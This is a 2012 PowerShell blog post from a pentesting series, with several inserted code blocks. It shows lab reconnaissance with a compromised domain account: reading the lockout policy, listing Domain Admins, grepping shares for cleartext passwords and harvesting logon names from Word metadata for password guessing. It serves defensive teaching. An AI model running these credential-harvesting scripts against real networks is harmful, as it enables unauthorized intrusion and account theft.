{"id":8821,"date":"2012-07-04T00:01:00","date_gmt":"2012-07-04T00:01:00","guid":{"rendered":"https:\/\/blogs.technet.microsoft.com\/heyscriptingguy\/2012\/07\/04\/use-powershell-to-discover-network-information-from-shares\/"},"modified":"2012-07-04T00:01:00","modified_gmt":"2012-07-04T00:01:00","slug":"use-powershell-to-discover-network-information-from-shares","status":"publish","type":"post","link":"https:\/\/devblogs.microsoft.com\/scripting\/use-powershell-to-discover-network-information-from-shares\/","title":{"rendered":"Use PowerShell to Discover Network Information from Shares"},"content":{"rendered":"<p><b>Summary<\/b>: Guest blogger, Niklas Goude, shows how to use Windows PowerShell to discover valuable network information from shares and file metadata.\nMicrosoft Scripting Guy, Ed Wilson, is here. We now come to Part 3 of Security Week with another guest blog by Niklas Goude.<\/p>\n<p style=\"padding-left: 30px\">Niklas Goude is a Security Consultant at TrueSec and an MVP in Windows PowerShell. In addition to his work performing security assessments for a variety of clients, he also has extensive experience in using Windows PowerShell to automate and implement Windows environments. He has been speaking at TechDays; SharePoint conferences in the U.S., Australia, and New Zealand; and other events and conferences. He is the author of two books about Windows PowerShell, and he shares his knowledge at <a href=\"http:\/\/www.powershell.nu\/\" target=\"_blank\">PowerShell.nu<\/a>. He is a member of the TrueSec Expert Team, an independent, elite team of security and infrastructure consultants that operates all over the world. The security team at TrueSec performs various tasks and services related to IT security such as code review, security health checks, and penetration testing. TrueSec also delivers top-notch training sessions in advanced IT security. 
Check out the <a href=\"http:\/\/www.truesec.com\/\" target=\"_blank\">TrueSec<\/a> website for additional information.\nThis is the third blog in a series of five, and we will talk about basic penetration testing techniques and how they affect misconfigured systems. The series covers everything from initial network reconnaissance techniques and brute force attacks to advanced extraction of registry secrets to assess dangerous system dependencies.\nThe key learning point is to demonstrate how you can use Windows PowerShell to accomplish almost any task&mdash;no matter the subject. The secondary learning point is to make you aware of common security issues and misconfigurations that may occur in Microsoft infrastructures today. One important thing to keep in mind is that the vulnerabilities we are looking for exist simply because of misconfigurations made by administrators, such as weak passwords or system dependencies.\nI hope you will learn and enjoy!<\/p>\n<h2><b>Part 3: Shares and metadata<\/b><\/h2>\n<p>Penetration testing is an important part of improving security in any network environment. A hacker only needs to find a few weaknesses (even one) to compromise important IT systems. An important task for an IT administrator is to identify potential weaknesses and mitigate them.\nAs soon as an attacker has access to a domain account, the attacker can start to collect information by querying domain services in various ways: listing all accounts in the domain, reading the domain password policy, searching shares for sensitive data, and anything else that helps the attacker find more privileged accounts. Reading the policy and group membership requires nothing more than a valid domain account; only access to the shares depends on their ACLs.\nIn the previous scenario, we managed to get our hands on a domain user&rsquo;s logon name and password. 
In today&rsquo;s scenario, we will use the domain account and focus on how to enumerate domain groups, policies, and shared resources by using Windows PowerShell.<\/p>\n<h2>Scenario<\/h2>\n<p>This scenario is based on a Windows domain environment consisting of three machines:<\/p>\n<ul>\n<li>DC01: domain controller<\/li>\n<li>SRV01: SQL Server and IIS<\/li>\n<li>SP01: SharePoint 2010, SQL Server, and IIS<\/li>\n<\/ul>\n<p>In addition, we have a client on the same network as the domain; however, the client is not a member of the domain. Each command in this scenario is executed from the client.\nThe server, SRV01, has a share that domain users can access. The share is used to back up Word documents, files, and other data. The Word documents have simply been copied to the share.\nFor mitigation information, please see <a href=\"http:\/\/office.microsoft.com\/en-us\/word-help\/remove-hidden-data-and-personal-information-by-inspecting-documents-HA010354329.aspx\" target=\"_blank\">Remove hidden data and personal information by inspecting documents<\/a>.<\/p>\n<h2>Code<\/h2>\n<p>With an actual domain account and password available, we can start searching for more information. The first step is to start Windows PowerShell on our attack machine by using the <b>runas<\/b> command with the <b>\/netonly<\/b> switch. With <b>\/netonly<\/b>, the supplied credentials are used only for outbound network authentication; the process itself still runs as the local user, which is exactly what we need from a client that is not a domain member. Note that <b>runas<\/b> does not validate <b>\/netonly<\/b> credentials up front: a wrong password only shows up when the first network access fails. The syntax of this command is shown here.<\/p>\n<p style=\"padding-left: 30px\">PS &gt; runas \/netonly \/user:hacme\\user008 powershell_ise.exe<br \/> Enter the password for hacme\\user008:\nWhen prompted for a password, we enter the password that we discovered in a previous post. 
Next, we can use the WinNT provider and ask for the default domain password policy settings.<\/p>\n<p style=\"padding-left: 30px\">PS &gt; $domain = [adsi](&#8220;WinNT:\/\/hacme.local&#8221;)<\/p>\n<p style=\"padding-left: 30px\">$domain.Properties.Keys | Foreach {<\/p>\n<p style=\"padding-left: 30px\">&nbsp; @{$_ = [string]$domain.Properties.Item($_) }<\/p>\n<p style=\"padding-left: 30px\">}<\/p>\n<p style=\"padding-left: 30px\">&nbsp;<\/p>\n<p style=\"padding-left: 30px\">Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Value<\/p>\n<p style=\"padding-left: 30px\">----&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -----<\/p>\n<p style=\"padding-left: 30px\">MinPasswordLength&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 7<\/p>\n<p style=\"padding-left: 30px\">MaxPasswordAge&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 3628800<\/p>\n<p style=\"padding-left: 30px\">MinPasswordAge&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 86400<\/p>\n<p style=\"padding-left: 30px\">PasswordHistoryLength&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 24<\/p>\n<p style=\"padding-left: 30px\">Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hacme.local<\/p>\n<p style=\"padding-left: 30px\">AutoUnlockInterval&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1800<\/p>\n<p style=\"padding-left: 30px\">LockoutObservationInterval&nbsp; 1800<\/p>\n<p style=\"padding-left: 30px\">MaxBadPasswordsAllowed&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0\nThe output tells us that the minimum password length is 7 characters. The WinNT provider reports ages and intervals in seconds, so a MaxPasswordAge of 3628800 is 42 days and a MinPasswordAge of 86400 is one day. More importantly, MaxBadPasswordsAllowed is set to 0, meaning that the domain has no account lockout policy. This means that we can make as many brute force attempts as we want without worrying about locking out an account. Keep in mind that this is the default domain policy only; on Windows Server 2008 and later, fine-grained password policies can apply stricter settings to specific users or groups, and the WinNT provider does not show those.\nOne of our goals is to find high-privileged accounts, so let&rsquo;s take a peek at the members of the Domain Admins group by using ADSI. (From a client that is not domain-joined, the serverless LDAP:\/\/ path relies on DNS resolving hacme.local; if that fails, put the domain controller name in the path.)<\/p>\n<p style=\"padding-left: 30px\">PS &gt; $dAdmin = [adsi]&#8220;LDAP:\/\/CN=Domain Admins,CN=Users,DC=hacme,DC=local&#8221;<\/p>\n<p style=\"padding-left: 30px\">$dAdmin.member<\/p>\n<p style=\"padding-left: 30px\">CN=SQL-Serviceaccount,OU=ServiceAccounts,OU=Hacme,DC=hacme,DC=local<\/p>\n<p style=\"padding-left: 30px\">CN=Administrator,CN=Users,DC=hacme,DC=local\nThe output lists the members of the Domain Admins group. One of them is a SQL Server service account, which is a classic dangerous system dependency: whoever compromises the SQL Server service gets domain admin rights. We&rsquo;ll get back to those accounts later.\nFor now, let us move on and look at enumerating shares and searching through files for sensitive data, such as connection strings and passwords. Because we started the Windows PowerShell ISE with domain credentials, we can use <b>dir<\/b> (alias for <b>Get-ChildItem<\/b>) with the <b>&ndash;Recurse<\/b> switch to list the files and folders under a UNC path.\nTo find out whether a server is sharing any folders, we simply type <b>dir \\\\SRV01\\<\/b> and press Tab; the ISE tab completion enumerates the shares for us. 
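The policy and group checks above, as an added example that is not code from the original post: it reads the same WinNT policy values into one object with the seconds converted to days and minutes, warns when the lockout threshold is 0, and walks group membership recursively over LDAP, flagging accounts whose password never expires. The domain name hacme.local, the domain controller name dc01.hacme.local and the Domain Admins distinguished name are assumptions taken from this scenario; run it in the runas /netonly session started above.

```powershell
# Added example, not code from the original post. Assumes domain hacme.local,
# a DC reachable as dc01.hacme.local, and a session started with runas /netonly.

function Get-DomainPasswordPolicy {
    param([string]$Domain = 'hacme.local')

    $d = [adsi]"WinNT://$Domain"
    $p = @{}
    foreach ($key in $d.Properties.Keys) {
        $p[$key] = [string]$d.Properties.Item($key)
    }

    # The WinNT provider reports ages and intervals in seconds.
    [pscustomobject]@{
        Domain                 = $p['Name']
        MinPasswordLength      = [int]$p['MinPasswordLength']
        MaxPasswordAgeDays     = [int]$p['MaxPasswordAge'] / 86400
        MinPasswordAgeDays     = [int]$p['MinPasswordAge'] / 86400
        PasswordHistoryLength  = [int]$p['PasswordHistoryLength']
        LockoutThreshold       = [int]$p['MaxBadPasswordsAllowed']   # 0 = no lockout at all
        LockoutDurationMinutes = [int]$p['AutoUnlockInterval'] / 60
        LockoutWindowMinutes   = [int]$p['LockoutObservationInterval'] / 60
    }
}

function Get-GroupMemberRecursive {
    param(
        [Parameter(Mandatory)][string]$GroupDN,
        [string]$Server = 'dc01.hacme.local',   # assumed DC; a non-domain-joined client cannot rely on serverless LDAP:// binding
        [string]$Via = '',
        [System.Collections.Generic.HashSet[string]]$Seen = (New-Object 'System.Collections.Generic.HashSet[string]')
    )

    if (-not $Seen.Add($GroupDN)) { return }      # stop on nested-group cycles

    # Note: DirectoryEntry returns at most 1500 values of 'member'; very large
    # groups need ranged retrieval (member;range=0-1499 and so on).
    $group = [adsi]"LDAP://$Server/$GroupDN"
    $path  = if ($Via) { "$Via > $($group.cn)" } else { [string]$group.cn }

    foreach ($dn in $group.member) {
        $obj = [adsi]"LDAP://$Server/$dn"
        if ($obj.objectClass -contains 'group') {
            Get-GroupMemberRecursive -GroupDN $dn -Server $Server -Via $path -Seen $Seen
            continue
        }
        $uac = [int]$obj.userAccountControl.Value
        [pscustomobject]@{
            SamAccountName       = [string]$obj.sAMAccountName
            DistinguishedName    = [string]$dn
            Via                  = $path                          # group nesting chain that grants the membership
            PasswordNeverExpires = ($uac -band 0x10000) -ne 0     # UF_DONT_EXPIRE_PASSWD, typical for service accounts
            Disabled             = ($uac -band 0x2) -ne 0         # UF_ACCOUNTDISABLE
        }
    }
}

$policy = Get-DomainPasswordPolicy
$policy
if ($policy.LockoutThreshold -eq 0) {
    Write-Warning 'No account lockout threshold: online password guessing is unlimited.'
}

Get-GroupMemberRecursive -GroupDN 'CN=Domain Admins,CN=Users,DC=hacme,DC=local' |
    Format-Table SamAccountName, Via, PasswordNeverExpires, Disabled -AutoSize
```

The recursive walk matters because a direct look at the <b>member</b> attribute, as in the post, misses accounts that are domain admins through a nested group; the <b>Via</b> column shows the chain that grants the membership.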
The completion list shows that, in addition to the hidden administrative shares, SRV01 exposes a share named Share. We can test accessing a share by using the <b>Get-ChildItem<\/b> cmdlet. If our account has access, the command outputs the files and folders that we have access to; folders we cannot read produce access-denied errors but do not stop the recursion.<\/p>\n<p style=\"padding-left: 30px\">PS &gt; dir \\\\srv01\\Share -Recurse | Select FullName<\/p>\n<p style=\"padding-left: 30px\">FullName<\/p>\n<p style=\"padding-left: 30px\">--------<\/p>\n<p style=\"padding-left: 30px\">\\\\srv01\\Share\\folder<\/p>\n<p style=\"padding-left: 30px\">\\\\srv01\\Share\\Document001.docx<\/p>\n<p style=\"padding-left: 30px\">\\\\srv01\\Share\\Document002.docx<\/p>\n<p style=\"padding-left: 30px\">\\\\srv01\\Share\\Document003.docx<\/p>\n<p style=\"padding-left: 30px\">\\\\srv01\\Share\\Document004.docx<\/p>\n<p style=\"padding-left: 30px\">\\\\srv01\\Share\\Document005.docx<\/p>\n<p style=\"padding-left: 30px\">\\\\srv01\\Share\\testscript.ps1<\/p>\n<p style=\"padding-left: 30px\">\\\\srv01\\Share\\folder\\Foo<\/p>\n<p style=\"padding-left: 30px\">\\\\srv01\\Share\\folder\\old.vbs<\/p>\n<p style=\"padding-left: 30px\">\\\\srv01\\Share\\folder\\Foo\\New Text Document.txt\nIt seems as if our account has access to the share. The share contains a couple of Word documents, a .ps1 file, a .vbs file, an .xml file, and a .txt file. To find out if any of the files contain sensitive data, we can pipe the objects to the <b>Select-String<\/b> cmdlet and set up a pattern of interest. In this example, we will search for user name and password. 
We will also restrict the search to files with the extensions .ps1, .vbs, .xml, and .txt by using the <b>&ndash;Include<\/b> parameter (the Word documents are zipped XML packages, so a plain text search would not find anything in them anyway). <b>Select-String<\/b> is case-insensitive by default, so the pattern also matches Username and Password.<\/p>\n<p style=\"padding-left: 30px\">PS &gt; dir \\\\srv01\\Share -Recurse -Include *.txt,*.vbs,*.ps1,*.xml |<\/p>\n<p style=\"padding-left: 30px\">Select-String -Pattern &#8220;username|password&#8221;<\/p>\n<p style=\"padding-left: 30px\">&nbsp;<\/p>\n<p style=\"padding-left: 30px\">\\\\srv01\\Share\\folder\\Input.xml:5: &lt;Username&gt;hacme\\spaccount&lt;\/Username&gt;<\/p>\n<p style=\"padding-left: 30px\">\\\\srv01\\Share\\folder\\Input.xml:6: &lt;Password&gt;Summer2012!&lt;\/Password&gt;<\/p>\n<p style=\"padding-left: 30px\">\\\\srv01\\Share\\testscript.ps1:1:# Get Username and password\nIf we study the output, we notice that someone left a Windows PowerShell script with a comment about user name and password, and an .xml file that contains a user name and password in clear text. Let&rsquo;s take a closer look by adding the <b>&ndash;Context<\/b> parameter to show the two lines before and after each matched line (matched lines are prefixed with &gt; in the output).<\/p>\n<p style=\"padding-left: 30px\">PS &gt; dir \\\\srv01\\Share -Recurse -Include *.txt,*.vbs,*.ps1,*.xml |<\/p>\n<p style=\"padding-left: 30px\">Select-String -Pattern &#8220;username|password&#8221; -Context 2,2<\/p>\n<p style=\"padding-left: 30px\">&nbsp;<\/p>\n<p style=\"padding-left: 30px\">&nbsp; \\\\srv01\\Share\\folder\\Input.xml:3: &lt;Passphrase&gt;P@ssPhrase&lt;\/Passphrase&gt;<\/p>\n<p style=\"padding-left: 30px\">&nbsp; \\\\srv01\\Share\\folder\\Input.xml:4: &lt;Account AddToLocalAdminsDuringSetup=&quot;true&quot;&gt;<\/p>\n<p style=\"padding-left: 30px\">&gt; \\\\srv01\\Share\\folder\\Input.xml:5: &lt;Username&gt;hacme\\spaccount&lt;\/Username&gt;<\/p>\n<p style=\"padding-left: 30px\">&gt; \\\\srv01\\Share\\folder\\Input.xml:6: &lt;Password&gt;Summer2012!&lt;\/Password&gt;<\/p>\n<p style=\"padding-left: 30px\">&nbsp; \\\\srv01\\Share\\folder\\Input.xml:7: &lt;Email&gt;spaccount@hacme.local&lt;\/Email&gt;<\/p>\n<p style=\"padding-left: 30px\">&nbsp; \\\\srv01\\Share\\folder\\Input.xml:8: &lt;\/Account&gt;<\/p>\n<p style=\"padding-left: 30px\">&gt; \\\\srv01\\Share\\testscript.ps1:1:# Get Username and password<\/p>\n<p style=\"padding-left: 30px\">&nbsp; \\\\srv01\\Share\\testscript.ps1:2:$cred = Get-Credential<\/p>\n<p style=\"padding-left: 30px\">&nbsp; \\\\srv01\\Share\\testscript.ps1:3:gwmi Win32_OperatingSystem -ComputerName sp01 -Credential $cred\nThe Windows PowerShell script stored on the share uses <b>Get-Credential<\/b> as input, so it doesn&rsquo;t tell us much. However, Input.xml looks like the configuration file for an installation script, most likely SharePoint given the account name spaccount and the SharePoint server SP01 in this environment, and it contains that account&rsquo;s password in clear text. What is even more interesting is the line &lt;Account AddToLocalAdminsDuringSetup=&quot;true&quot;&gt;, which suggests that the account was added to the local Administrators group on the server it was used to install. We will investigate local admin accounts in the next post.\nThe share also contained some Word documents, and Word documents can contain metadata that describes user information such as a user&rsquo;s logon name. Because we are already on the domain, this is not very interesting for us at the moment: we can simply enumerate the domain and retrieve all the domain accounts. However, this would be useful if we had failed in any of our previous attacks.\nThere are a lot of public Word documents available on the Internet, and by simply looking at the metadata, we could find users&rsquo; logon names. Let us see how that works. 
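Before moving on to the metadata, here is the share search above generalized, as an added example that is not code from the original post: it enumerates a server's shares with <b>net view</b>, walks every share it can read, restricts the search to text-like files under a size cap, and turns each <b>Select-String</b> hit into an object with the file, line number, matched word and the following line of context. The server name srv01, the extension list and the pattern list are assumptions for illustration; run it in the runas /netonly session as above.

```powershell
# Added example, not code from the original post. Assumes the runas /netonly
# session from the walkthrough and a server that answers NetShareEnum (net view).

function Get-ShareName {
    # Parse 'net view' so this works from a non-domain-joined client without extra
    # modules. Hidden shares (C$, ADMIN$) are not listed by net view, and share
    # names containing spaces are not handled by this regex.
    param([Parameter(Mandatory)][string]$ComputerName)

    net view "\\$ComputerName" 2>$null | ForEach-Object {
        if ($_ -match '^(\S+)\s+Disk\b') { $Matches[1] }
    }
}

function Find-ShareCredential {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        # Text-like file types worth grepping; .docx and friends are zip packages and need unpacking first.
        [string[]]$Include = @('*.txt','*.xml','*.config','*.ini','*.ps1','*.vbs','*.bat','*.cmd','*.sql'),
        [int]$MaxSizeKB = 2048,
        # Select-String is case-insensitive by default; 'pwd=' avoids matching every 'pwd' path variable.
        [string]$Pattern = 'password|passwd|pwd=|connectionstring|secret|apikey|credential'
    )

    foreach ($share in (Get-ShareName -ComputerName $ComputerName)) {
        $root = "\\$ComputerName\$share"

        # SilentlyContinue: folders the account cannot read are skipped, not fatal.
        Get-ChildItem -Path $root -Recurse -Include $Include -ErrorAction SilentlyContinue |
            Where-Object { -not $_.PSIsContainer -and $_.Length -le ($MaxSizeKB * 1KB) } |
            Select-String -Pattern $Pattern -Context 1,1 |
            ForEach-Object {
                [pscustomobject]@{
                    Share = $root
                    File  = $_.Path
                    Line  = $_.LineNumber
                    Match = $_.Matches[0].Value
                    Text  = $_.Line.Trim()
                    After = ($_.Context.PostContext -join ' ').Trim()   # the value often sits on the next line
                }
            }
    }
}

Find-ShareCredential -ComputerName srv01 |
    Sort-Object File, Line |
    Format-Table File, Line, Match, Text -AutoSize
```

Expect false positives (comments, prompts for credentials, variable names): the objects are meant to be triaged, which is why the surrounding line is carried along rather than only the match.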
In this example we&rsquo;ll simply copy the Word documents from the share to a local folder and start peeking at the metadata.<\/p>\n<p style=\"padding-left: 30px\">PS &gt; dir \\\\srv01\\Share -Recurse -Include *.docx |<\/p>\n<p style=\"padding-left: 30px\">Copy-Item -Destination C:\\temp\nIf we want to read the metadata, we can use the <b>Word.Application<\/b> COM object. The COM object requires that Word is installed on the system. First we create an instance of <b>Word.Application<\/b>. We also set the <b>Visible<\/b> property to <b>$false<\/b> so that no Word window appears.<\/p>\n<p style=\"padding-left: 30px\">PS &gt; $word = New-Object -ComObject Word.Application<\/p>\n<p style=\"padding-left: 30px\">PS &gt; $word.Visible = $false\nNext, we open the document by using the <b>Open()<\/b> method.<\/p>\n<p style=\"padding-left: 30px\">PS &gt; $openDoc = $word.Documents.Open(&#8220;C:\\temp\\Document001.docx&#8221;)\nThen, we read the document&rsquo;s Open XML package through the <b>WordOpenXML<\/b> property and store the <b>core.xml<\/b> part in a variable.<\/p>\n<p style=\"padding-left: 30px\">PS &gt; $docX = [xml]$openDoc.WordOpenXML<\/p>\n<p style=\"padding-left: 30px\">PS &gt; $coreXML = $docX.package.part | Where { $_.name -eq &#8220;\/docProps\/core.xml&#8221; }\nAnd now we can simply take a peek in the <b>CoreProperties<\/b>, which may give us information regarding users&rsquo; logon names.<\/p>\n<p style=\"padding-left: 30px\">PS &gt; $coreXML.xmlData.coreProperties<\/p>\n<p style=\"padding-left: 30px\">&nbsp;<\/p>\n<p style=\"padding-left: 30px\">cp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : http:\/\/schemas.openxmlformats.org\/package\/2006\/metadata\/core-properties<\/p>\n<p style=\"padding-left: 30px\">dc&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : http:\/\/purl.org\/dc\/elements\/1.1\/<\/p>\n<p style=\"padding-left: 30px\">dcterms&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : http:\/\/purl.org\/dc\/terms\/<\/p>\n<p style=\"padding-left: 30px\">dcmitype&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : http:\/\/purl.org\/dc\/dcmitype\/<\/p>\n<p style=\"padding-left: 30px\">xsi&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : http:\/\/www.w3.org\/2001\/XMLSchema-instance<\/p>\n<p style=\"padding-left: 30px\">creator&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : Jean-Luc Picard (user001)<\/p>\n<p style=\"padding-left: 30px\">lastModifiedBy : Jean-Luc Picard (user001)<\/p>\n<p style=\"padding-left: 30px\">revision&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : 1<\/p>\n<p style=\"padding-left: 30px\">created&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : created<\/p>\n<p style=\"padding-left: 30px\">modified&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : modified\nNotice how the metadata displays the user&rsquo;s first name, last name, and logon name. (The <b>created<\/b> and <b>modified<\/b> elements show up as their element names because they carry an xsi:type attribute; their text child holds the timestamp.) When you are done, close the document and quit the hidden Word instance, or a winword.exe process keeps running in the background.\nNow, let&rsquo;s script it and repeat it on all the downloaded documents. In this example, we&rsquo;ll use the <b>Get-TSWordXMetadata<\/b> function, which is linked in the Download section below.<\/p>\n<p style=\"padding-left: 30px\">PS &gt; dir C:\\temp | Get-TSWordXMetadata |<\/p>\n<p style=\"padding-left: 30px\">Select Creator, LastModifiedBy<\/p>\n<p style=\"padding-left: 30px\">&nbsp;<\/p>\n<p style=\"padding-left: 30px\">Creator&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LastModifiedBy<\/p>\n<p style=\"padding-left: 30px\">-------&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; --------------<\/p>\n<p style=\"padding-left: 30px\">Jean-Luc Picard (user001)&nbsp;&nbsp;&nbsp;&nbsp; Jean-Luc Picard (user001)<\/p>\n<p style=\"padding-left: 30px\">William Riker (user002)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; William Riker (user002)<\/p>\n<p style=\"padding-left: 30px\">Geordi LaForge (user003)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Geordi LaForge (user003)<\/p>\n<p style=\"padding-left: 30px\">Worf Son of Mogh (user004)&nbsp;&nbsp;&nbsp; Worf Son of Mogh (user004)<\/p>\n<p style=\"padding-left: 30px\">Beverly Crusher (user005)&nbsp;&nbsp;&nbsp;&nbsp; Beverly Crusher (user005)<\/p>\n<h2>Download<\/h2>\n<ul>\n<li>The <a href=\"http:\/\/gallery.technet.microsoft.com\/scriptcenter\/Get-TSWordXMetadata-8c46e79e\" target=\"_blank\">Get-TSWordXMetadata<\/a>&nbsp;function can be downloaded from the Script Center Repository.<\/li>\n<li>Additional functions and code related to security are available on the <a href=\"http:\/\/www.truesec.com\/security\/tools\" target=\"_blank\">TrueSec Tools<\/a> site.<\/li>\n<\/ul>\n<p>~Niklas\nI want to thank Niklas for another very interesting blog. 
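The metadata walk above depends on Word being installed and on the external Get-TSWordXMetadata function. As an added example that is not code from the original post and not that function, here is the same extraction done without Word: Office Open XML files (.docx, .xlsx, .pptx) are zip packages, and the creator and lastModifiedBy fields live in the docProps/core.xml part, so .NET's ZipFile class is enough to read them. The folder C:\temp and the "Display Name (logon)" naming convention are assumptions taken from this scenario; the parsing needs .NET 4.5 or later (Windows PowerShell 3.0 and up, or PowerShell 7).

```powershell
# Added example, not code from the original post and not Get-TSWordXMetadata.
# Assumes the documents were copied to C:\temp as in the walkthrough.

Add-Type -AssemblyName System.IO.Compression.FileSystem

function Get-OfficeCoreMetadata {
    param([Parameter(Mandatory, ValueFromPipeline)][System.IO.FileInfo]$File)
    process {
        if ($File.Extension -notmatch '^\.(docx|xlsx|pptx)$') { return }

        $zip = [System.IO.Compression.ZipFile]::OpenRead($File.FullName)
        try {
            $entry = $zip.GetEntry('docProps/core.xml')
            if (-not $entry) { return }          # package without core properties

            $reader = New-Object System.IO.StreamReader($entry.Open())
            try { [xml]$core = $reader.ReadToEnd() } finally { $reader.Dispose() }

            # PowerShell's XML adapter drops the cp:, dc: and dcterms: prefixes.
            $p = $core.coreProperties
            [pscustomobject]@{
                File           = $File.Name
                Creator        = [string]$p.creator
                LastModifiedBy = [string]$p.lastModifiedBy
                Created        = [string]$p.created.'#text'    # element carries an xsi:type attribute
                Modified       = [string]$p.modified.'#text'
                Revision       = [string]$p.revision
            }
        }
        finally { $zip.Dispose() }
    }
}

function Get-LogonNameFromMetadata {
    # In this lab the display names look like "Jean-Luc Picard (user001)"; pull the
    # parenthesised logon name. Adjust the regex to the target's naming convention.
    param([Parameter(Mandatory, ValueFromPipeline)]$Metadata)
    process {
        foreach ($value in @($Metadata.Creator, $Metadata.LastModifiedBy)) {
            if ($value -match '\(([^)]+)\)\s*$') { $Matches[1] }
        }
    }
}

$meta = Get-ChildItem C:\temp -Filter *.docx | Get-OfficeCoreMetadata
$meta | Format-Table File, Creator, LastModifiedBy, Modified -AutoSize

# Candidate logon names for a password-guessing step, obtained without touching the domain.
$meta | Get-LogonNameFromMetadata | Sort-Object -Unique
```

Because nothing here renders the document, the same function works on files pulled from a public website, which is the case the post describes where domain access is not yet available.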
Join us tomorrow for another exciting blog as Security Week continues.\nI invite you to follow me on <a href=\"http:\/\/bit.ly\/scriptingguystwitter\" target=\"_blank\">Twitter<\/a> and <a href=\"http:\/\/bit.ly\/scriptingguysfacebook\" target=\"_blank\">Facebook<\/a>. If you have any questions, send email to me at <a href=\"http:\/\/blogs.technet.commailto:scripter@microsoft.com\" target=\"_blank\">scripter@microsoft.com<\/a>, or post your questions on the <a href=\"http:\/\/bit.ly\/scriptingforum\" target=\"_blank\">Official Scripting Guys Forum<\/a>. See you tomorrow. Until then, peace.<\/p>\n<p><b>Ed Wilson, Microsoft Scripting Guy<\/b>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Summary: Guest blogger, Niklas Goude, shows how to use Windows PowerShell to discover valuable network information from shares and file metadata. Microsoft Scripting Guy, Ed Wilson, is here. We now come to Part 3 of Security Week with another guest blog by Niklas Goude. Niklas Goude is a Security Consultant at TrueSec and an MVP [&hellip;]<\/p>\n","protected":false},"author":596,"featured_media":87096,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1],"tags":[56,84,183,49,3,63,185,12,45],"class_list":["post-8821","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-scripting","tag-guest-blogger","tag-microsoft-word","tag-niklas-goude","tag-office","tag-scripting-guy","tag-security","tag-shared-folders-and-mapped-drives","tag-storage","tag-windows-powershell"],"acf":[],"blog_post_summary":"<p>Summary: Guest blogger, Niklas Goude, shows how to use Windows PowerShell to discover valuable network information from shares and file metadata. Microsoft Scripting Guy, Ed Wilson, is here. We now come to Part 3 of Security Week with another guest blog by Niklas Goude. 
Niklas Goude is a Security Consultant at TrueSec and an MVP [&hellip;]<\/p>\n","_links":{"self":[{"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/posts\/8821","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/users\/596"}],"replies":[{"embeddable":true,"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/comments?post=8821"}],"version-history":[{"count":0,"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/posts\/8821\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/media\/87096"}],"wp:attachment":[{"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/media?parent=8821"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/categories?post=8821"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/w